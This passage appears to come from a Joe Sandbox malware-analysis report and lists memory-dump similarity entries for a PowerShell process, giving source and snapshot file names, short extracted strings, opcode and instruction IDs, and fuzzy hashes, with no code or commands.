                                            • Instruction Fuzzy Hash: 2D226D30B001288FCB25DF25C9546AEBBB2BF89304F1590E9D50AAB351DB35EE85CF81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$(f{l$x.lk$-lk
                                            • API String ID: 0-2718555691
                                            • Opcode ID: 81577c051e34ee22778a5181f0505e543c77d7863c5113ec16a164c2f69a4603
                                            • Instruction ID: f8bdd7881538d605803b1f4d4db7e7ac023d1fa48d4888d02205e2753647315a
                                            • Opcode Fuzzy Hash: 81577c051e34ee22778a5181f0505e543c77d7863c5113ec16a164c2f69a4603
                                            • Instruction Fuzzy Hash: 72E179F0A00205DFDB18DBA8C954B9EBBB2AFC9704F248169E901AF755CB75EC418B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$x.lk$-lk
                                            • API String ID: 0-1644924902
                                            • Opcode ID: 81d0261188712b139f12221ed69f0aff554f14d7a386685a6c94bf1d3db58233
                                            • Instruction ID: ed5db5ed096864afc7bf32eafde43e786298e4aba0b73b0175873ff7da0b533b
                                            • Opcode Fuzzy Hash: 81d0261188712b139f12221ed69f0aff554f14d7a386685a6c94bf1d3db58233
                                            • Instruction Fuzzy Hash: 9BA25BF4A01205DFDB54CF58C540F5ABBB2AF84714F25C2A9E909AB352CB72ED42CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$4xl$x.lk
                                            • API String ID: 0-1569599727
                                            • Opcode ID: 305dc4d8bb9116dec469243cde7389ee9a28ab17cd2a99d64a5d7b8a810b659d
                                            • Instruction ID: a6c0030dfaaa505f3fe74ca005051a4cba98ee4ee93162769845b9013bc6d469
                                            • Opcode Fuzzy Hash: 305dc4d8bb9116dec469243cde7389ee9a28ab17cd2a99d64a5d7b8a810b659d
                                            • Instruction Fuzzy Hash: 73123DF4A01215DFEB64CB18C949BAAB7B2BF85704F1081A5D909AF351CB71ED81CF61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$4xl$x.lk
                                            • API String ID: 0-1569599727
                                            • Opcode ID: 31ab0fae9bc49612465efae62c2d9c710cca91b95e9416cf5b4e2559605a2532
                                            • Instruction ID: a0911ce96599dc459307cf1722e8ca90f5070518f4f29ccff379cfc039225f83
                                            • Opcode Fuzzy Hash: 31ab0fae9bc49612465efae62c2d9c710cca91b95e9416cf5b4e2559605a2532
                                            • Instruction Fuzzy Hash: 00E14CF4A01215DFEB64CB18C949BAAB7B2BB85704F10C1A9E909AF351CB71ED81CF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$x.lk$-lk
                                            • API String ID: 0-1644924902
                                            • Opcode ID: 626fd960619499a632f8ee3e8a334d43d1a198f3abdb1cd919e3ed8fff3fda89
                                            • Instruction ID: f94c449c300df452d33b16a6247cc0646b418f6552fbf50f0e0f09cc9b948eef
                                            • Opcode Fuzzy Hash: 626fd960619499a632f8ee3e8a334d43d1a198f3abdb1cd919e3ed8fff3fda89
                                            • Instruction Fuzzy Hash: 98C168F4A002059FDB14CFA8C944B9EBBF2AFC9704F148269E905AF356CB75E941CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$(f{l
                                            • API String ID: 0-3450855952
                                            • Opcode ID: a9c46bdfc712fa8e3a78f88bccbe102131b01e1680a50fff24a65d98119fb59c
                                            • Instruction ID: 8475a75bebcf31feed2578f0ced9e3b1453ed58fcb69b130319f58280780bfc6
                                            • Opcode Fuzzy Hash: a9c46bdfc712fa8e3a78f88bccbe102131b01e1680a50fff24a65d98119fb59c
                                            • Instruction Fuzzy Hash: C732D1F1B00207DFDB54CF68C544AAABBF2AF85214F18827AD915AB351DB31ED41CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.lk$-lk
                                            • API String ID: 0-3421899766
                                            • Opcode ID: 191f15512ef2c0f5fc32f89e44b722b2dbafbac5037d16b7518accc879b3143a
                                            • Instruction ID: 35834b64dbbfaedaf575e1ebc8c3811bfe9f3fa3c98f4da1557f8aa99658a1cf
                                            • Opcode Fuzzy Hash: 191f15512ef2c0f5fc32f89e44b722b2dbafbac5037d16b7518accc879b3143a
                                            • Instruction Fuzzy Hash: CB325DF4A00205DFDB54CF58C941B5AFBB2AF88714F1492A9E909AB352CB72ED41CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.lk$-lk
                                            • API String ID: 0-3421899766
                                            • Opcode ID: e9ab9fb1cacf5d9cdad9b3ca8d5e39cf3f5f5bae5c8f1c81bb8d3092b03ee244
                                            • Instruction ID: 2251baa580668e607138b8a8bc55e7c72081c8820fb754a49e320aa33aaf6467
                                            • Opcode Fuzzy Hash: e9ab9fb1cacf5d9cdad9b3ca8d5e39cf3f5f5bae5c8f1c81bb8d3092b03ee244
                                            • Instruction Fuzzy Hash: 6E327FB0A01214DFDB54DB58C955FAABBB2AFC9700F1081A5E9099F351CB72ED81CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$(f{l
                                            • API String ID: 0-3450855952
                                            • Opcode ID: b9c3c7fc9c1d2363df3bd79363deb3fae78c6348e1cccfaa78be2d6566d80dc6
                                            • Instruction ID: db06ac346d76743b2b847bfb633184e65a254956340e561a79f1e81867a66071
                                            • Opcode Fuzzy Hash: b9c3c7fc9c1d2363df3bd79363deb3fae78c6348e1cccfaa78be2d6566d80dc6
                                            • Instruction Fuzzy Hash: F7129CF0B00209DFD754CB98C550A6ABBF2AF89714F14C169D919AF756CB32EC82CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$(f{l
                                            • API String ID: 0-3450855952
                                            • Opcode ID: 9748e1d43a05fc9270a0459314ee7322a0f400824a1e59a37fd9cefe6fa717a8
                                            • Instruction ID: fd39f5f62f41ae13cebe63b65729be964c7aa6825bc3eb6343253c84076220af
                                            • Opcode Fuzzy Hash: 9748e1d43a05fc9270a0459314ee7322a0f400824a1e59a37fd9cefe6fa717a8
                                            • Instruction Fuzzy Hash: 641268F4A01241EFDB54CF98C584F6AB7B2AF85304F25C269E918AB751CB72EC42CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.lk$-lk
                                            • API String ID: 0-3421899766
                                            • Opcode ID: ce571b6c3a95cd82dde8b64a6580f6099444156d19020ec723eb35dd6de0a376
                                            • Instruction ID: 2714a2c9bd3537454a08c3f6fd427fdf17719b09815527ea6339e114749b5603
                                            • Opcode Fuzzy Hash: ce571b6c3a95cd82dde8b64a6580f6099444156d19020ec723eb35dd6de0a376
                                            • Instruction Fuzzy Hash: 87025EB4A00205DFDB64CF58C945B5ABBB2AFC8704F1491A9E909AF392CB71ED41CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$h2nk
                                            • API String ID: 0-2497662966
                                            • Opcode ID: dc7f48f496fa112a3a0881c52b5d4d95d098de1cb3f6bda72d6ca60ae77146cc
                                            • Instruction ID: 34af818270ccaa8616e742a546bfd84e48507bb652739ec58fcde5d3bbef40c8
                                            • Opcode Fuzzy Hash: dc7f48f496fa112a3a0881c52b5d4d95d098de1cb3f6bda72d6ca60ae77146cc
                                            • Instruction Fuzzy Hash: 9E0268F4B00209DFDB54CB58C551AAABBF2AF89714F14C269E905AB351C772EC82CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l$(f{l
                                            • API String ID: 0-3450855952
                                            • Opcode ID: 932f14b6f459ea71d94a257492ee6417233b18d75cf58c85be9d0d28c56ebdab
                                            • Instruction ID: 76b4d2c3e22931f304ef40f3cfe553c5c9113c4e9a1169c41605877ee189d2ad
                                            • Opcode Fuzzy Hash: 932f14b6f459ea71d94a257492ee6417233b18d75cf58c85be9d0d28c56ebdab
                                            • Instruction Fuzzy Hash: 85918EF0A00206EFD714CF68C944A9EB7F2AFC9314F148269E905AB755CB72ED51CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h]#m$I#m
                                            • API String ID: 0-1852219892
                                            • Opcode ID: 09eaa11a50fd552b3c7c9a81f356080db1bdd4875418731fb0fa749da80802d9
                                            • Instruction ID: 5d87dc080ee9a99a3dec36a7aa4e558f6c1cfb17ba1cb69b8513b464cb190448
                                            • Opcode Fuzzy Hash: 09eaa11a50fd552b3c7c9a81f356080db1bdd4875418731fb0fa749da80802d9
                                            • Instruction Fuzzy Hash: 09315930B051288FCB25DB24C9546EEB7B2BF89305F1154E9D509AB351CB36AE86CF81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l
                                            • API String ID: 0-2153210385
                                            • Opcode ID: c2a6d5957e0e2a692a8391a6bb7db18b68db466c550cd74e453e2de6edc5f9ed
                                            • Instruction ID: 2ca1edd5451f8a69f56a7909e057e655f082c067e229ca95e98496f384de83fe
                                            • Opcode Fuzzy Hash: c2a6d5957e0e2a692a8391a6bb7db18b68db466c550cd74e453e2de6edc5f9ed
                                            • Instruction Fuzzy Hash: E1F149F4A00209DFDB54CF98C541EAABBF2AF89714F15C269E918AB355C732EC81CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V#m
                                            • API String ID: 0-1157912448
                                            • Opcode ID: ee9d5423002131079e2606c356de408502b6f3e8478dc4747a307794a29bb460
                                            • Instruction ID: dc36f9bd50cf9d2c342b2b99e2a32d2cc30e5e9baee4e1c3ae98801b34c6e967
                                            • Opcode Fuzzy Hash: ee9d5423002131079e2606c356de408502b6f3e8478dc4747a307794a29bb460
                                            • Instruction Fuzzy Hash: 4FB18C70E00229CFDB10CFA9CA857DEBBF1BF88714F149129E814A7294EB74A845DF81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l
                                            • API String ID: 0-2153210385
                                            • Opcode ID: ad0710a2e3e6af5ff0a743b089bcb2dd4ad6a048ee68d006abffefb61ab66f04
                                            • Instruction ID: 0b4243e7f7e3b1bdff3b9e4d1c4a4a666c5cb3d3796e80951880d6eec8c8eab4
                                            • Opcode Fuzzy Hash: ad0710a2e3e6af5ff0a743b089bcb2dd4ad6a048ee68d006abffefb61ab66f04
                                            • Instruction Fuzzy Hash: 82918FF1A00206EFD714CF54C984B9EB7F2AF89314F1482A9E905AB355C772ED51CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l
                                            • API String ID: 0-2153210385
                                            • Opcode ID: a4ab14b9f52205f2c85b877008e2bb001ec7cc62254d565d83a6fba701f8402c
                                            • Instruction ID: 0bea2d36081ee3240ff192cc71b45029460aa6fe89f9bf74a92f990729aabb3d
                                            • Opcode Fuzzy Hash: a4ab14b9f52205f2c85b877008e2bb001ec7cc62254d565d83a6fba701f8402c
                                            • Instruction Fuzzy Hash: CB813AF4A00206DFDB54CF54C594AAABBF2EF89314F1986A9E904AB355C732EC41CF61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f{l
                                            • API String ID: 0-2153210385
                                            • Opcode ID: d6b46ef9b3c0f13b5eff82ddae33d0990ce92fa5db92a6424e4f6eda0c4b9f36
                                            • Instruction ID: 8862e69f292a652e1193a6a2a6c81db4f13d98e862caf01d876e4ecbc0476ceb
                                            • Opcode Fuzzy Hash: d6b46ef9b3c0f13b5eff82ddae33d0990ce92fa5db92a6424e4f6eda0c4b9f36
                                            • Instruction Fuzzy Hash: 698119F4A00206DFDB54CF54C594AAABBF2EF89314F1986A9E904AB355C732EC41CF61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.lk
                                            • API String ID: 0-2922684670
                                            • Opcode ID: f8e2c1676a953f9bc1e98094892827863e069bb351a021a0929d7cf295694385
                                            • Instruction ID: f11f3a816d69dc8cf28414b737a06eb2f791c26d1c1fadb158b5922e5b9c7e4a
                                            • Opcode Fuzzy Hash: f8e2c1676a953f9bc1e98094892827863e069bb351a021a0929d7cf295694385
                                            • Instruction Fuzzy Hash: 8C3163B0B40214EBE7049BA4C855BAF7AB3EFC5754F208125E9017F791CFB5AD428B91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed7a49742600df44eba75341856ffd0b3d9345378c99ab66bfd57c567cbd335c
                                            • Instruction ID: 4498c5b739b160019cccdf98b07977a3aaf4402b2f8c5bc947dd16e0d01ee0eb
                                            • Opcode Fuzzy Hash: ed7a49742600df44eba75341856ffd0b3d9345378c99ab66bfd57c567cbd335c
                                            • Instruction Fuzzy Hash: 8CF139F2704206DFDB649B79C85076ABBE6AFC1214F2482FAD615EB252CA31DC41C7A1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34c1bcd122ba282ea4eff67fee75454959563f0b81786e266b65f1e44843f380
                                            • Instruction ID: 951df3da27e67d1c299788bd3599e8b23252631594494e9e8cc9988cf77cb423
                                            • Opcode Fuzzy Hash: 34c1bcd122ba282ea4eff67fee75454959563f0b81786e266b65f1e44843f380
                                            • Instruction Fuzzy Hash: B9F12874A00219EFDB15DFA8D984A9DBBB2FF88310F249559E814AB355C731EC82CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 825331afca63fc1c92987dcb3b287dc5548834a57d3c1bb911383544720dbcc2
                                            • Instruction ID: f3a97e84be75d6c9a675337191fade1b33d241fcc7505f9c0a99e68a60965f75
                                            • Opcode Fuzzy Hash: 825331afca63fc1c92987dcb3b287dc5548834a57d3c1bb911383544720dbcc2
                                            • Instruction Fuzzy Hash: 18C1C131A00219CFDB14DFA9DA44AADBBF2FF85310F218569E405AB365DB34ED49CB80
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cbba363e0dd901c6616bcb36c06c98e8005b2805ea826681884968af5a7031e
                                            • Instruction ID: 24248261b8452ec817b0b6ecd8e388950f8aa2b24dd0d6bea58d60dd26ec0cc0
                                            • Opcode Fuzzy Hash: 2cbba363e0dd901c6616bcb36c06c98e8005b2805ea826681884968af5a7031e
                                            • Instruction Fuzzy Hash: 2AB19D70E00229DFDB10CFA8CA9179EBBF1BF48714F149529E815E7294EB74A885DF81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66bf8f21c7470cbea1311e39a17ea939d80bc9028d033cb765236d3e63a7f89b
                                            • Instruction ID: 5a1645a874eafeb2bad2fbec21b875aa6dc429af0e4ecf8a1fe604c78f581e45
                                            • Opcode Fuzzy Hash: 66bf8f21c7470cbea1311e39a17ea939d80bc9028d033cb765236d3e63a7f89b
                                            • Instruction Fuzzy Hash: C27168F5B00306EFCB648A789C103BEBBE6AFC5250F14827AD915DB241EB31D960C7A1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d3cd9f22e40dba8f8e38db8ecd8f09c842f68b2c35144e54fa36771ca7e5251
                                            • Instruction ID: ce441f778dea67c79007fbcdc0a630b49a799bcacaee13ef6a556dc473a101d9
                                            • Opcode Fuzzy Hash: 9d3cd9f22e40dba8f8e38db8ecd8f09c842f68b2c35144e54fa36771ca7e5251
                                            • Instruction Fuzzy Hash: 7671AB30A00218CFDB14DF69C980A9EBBF2FF89314F14856AD059DB751DB71AC46CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c54bec79b297d09f010aff9cb5c06dbdaf836df129bff80ad7ae78ef23cecc6
                                            • Instruction ID: 818c17978e49e0a0a8993b1658ed17987a913534db6895b0812b82db6e527769
                                            • Opcode Fuzzy Hash: 1c54bec79b297d09f010aff9cb5c06dbdaf836df129bff80ad7ae78ef23cecc6
                                            • Instruction Fuzzy Hash: 97715A70A00218DFDB18DFA5D584BADBBF2BF88304F149469D416AB7A0DB74AD46CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09339b6e6af61ebd3ddc6cbacb9775cd11230182ee68dd22cebe35766f5dfccc
                                            • Instruction ID: 924b95c8a55a6035ab5d4ce5fbbfa97b4082f9c3cec01b46a6ad5d4a35a5585b
                                            • Opcode Fuzzy Hash: 09339b6e6af61ebd3ddc6cbacb9775cd11230182ee68dd22cebe35766f5dfccc
                                            • Instruction Fuzzy Hash: 7E416EF1B002128BDB255BB884117BEBFE29FC1625F14967AD9019F751DFB1C80187A2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f00de0d8699df348244c0ae1f795157d2586059d9ee63a7a61f5a71463fe708a
                                            • Instruction ID: 259788c9236cdba0905a452440c023754689cf313fd3872de23dcf9cbdb0fef9
                                            • Opcode Fuzzy Hash: f00de0d8699df348244c0ae1f795157d2586059d9ee63a7a61f5a71463fe708a
                                            • Instruction Fuzzy Hash: DF419A30A002159FDB15DB75C954AAE7BF2FF8D360F085468E406AB7A0DB34AD82CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ef01e5f858432d623f0ae92a336c7a00450b4dc1b0b9dbd75a44a4f3858e9aa
                                            • Instruction ID: 8cefa40c088c60aaee4d06dfa4390a04ec1f0041233b897118442516cba8e691
                                            • Opcode Fuzzy Hash: 7ef01e5f858432d623f0ae92a336c7a00450b4dc1b0b9dbd75a44a4f3858e9aa
                                            • Instruction Fuzzy Hash: A5412AF1B002199BCB549FB998002AEBBF5AFC4210F24863AD915DB351EF71DD81C7A1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4579aecd44b4933140a2334acadb7049846e38dd7f56a22fd6520ce6856998e0
                                            • Instruction ID: 26ec5aaaa3d1d7fbdef5a04ab143740edd981adc12fc52ce1758548e08f4e49c
                                            • Opcode Fuzzy Hash: 4579aecd44b4933140a2334acadb7049846e38dd7f56a22fd6520ce6856998e0
                                            • Instruction Fuzzy Hash: AC416B70A00218CFDB18DFAAC9447AEBBF2FF89350F148569D005AB791DB74AD45CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aca08b955c6bb7f0344b8933c9325aaecd73b93c2888133c8f1ec226a1d726ca
                                            • Instruction ID: a8e1f34d91f02f2ad135754688ed5440e095183560ab831b517f02f32e6a35ce
                                            • Opcode Fuzzy Hash: aca08b955c6bb7f0344b8933c9325aaecd73b93c2888133c8f1ec226a1d726ca
                                            • Instruction Fuzzy Hash: EE51C974A00219EFDB05CFA8D584A9DFBB2FF88314F249559E414AB365CB71AD81CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fcd0f9ae28d9a9d1b12177e65559dfb452767e62e658100f8982a747bb80bd88
                                            • Instruction ID: b139fba54a7156203aa9f7f76337ff1b8c75a9ea80a72d79d2e219e9eddd967d
                                            • Opcode Fuzzy Hash: fcd0f9ae28d9a9d1b12177e65559dfb452767e62e658100f8982a747bb80bd88
                                            • Instruction Fuzzy Hash: E9416D74A00215CFCB05CF59C694AAEFBB1FF48310B158599D911AB3A4C732FD51CBA0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56c1eb60db8898a13ba7e372323601946f13464dbcc5e49e4a2bbcc330b6f157
                                            • Instruction ID: e2966aec41326a25d462572895a5bf2e1b5a92b20162bcb4cb5fd59712b53141
                                            • Opcode Fuzzy Hash: 56c1eb60db8898a13ba7e372323601946f13464dbcc5e49e4a2bbcc330b6f157
                                            • Instruction Fuzzy Hash: C7413674A00519CFCB09CF59C694AAEF7B1FF48310B2186A9D915AB3A4C732FD51CBA0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3048887003.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_4320000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be388fd3861a050bca72abfd9383a0062f358153addd42dadbe4d8a4870507a2
                                            • Instruction ID: 0e813365e2f87e1ac761c5e0d3054ba3a72a8625929b09ad0b91744cba1201d5
                                            • Opcode Fuzzy Hash: be388fd3861a050bca72abfd9383a0062f358153addd42dadbe4d8a4870507a2
                                            • Instruction Fuzzy Hash: 9F41AA74A04255DFCB11CF58CA90AAAFBB2FF49310B25869AD544EB392C331FC81CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.3053662173.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7040000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a9e2df68088f9131e2f032e0295922d6338888134a00ebbffaa9cac004d67606
                                            • Instruction ID: f0d3e5abef4067e0b3179553838338046dd82d1c1c7c8fb9cf57a15faa184a04
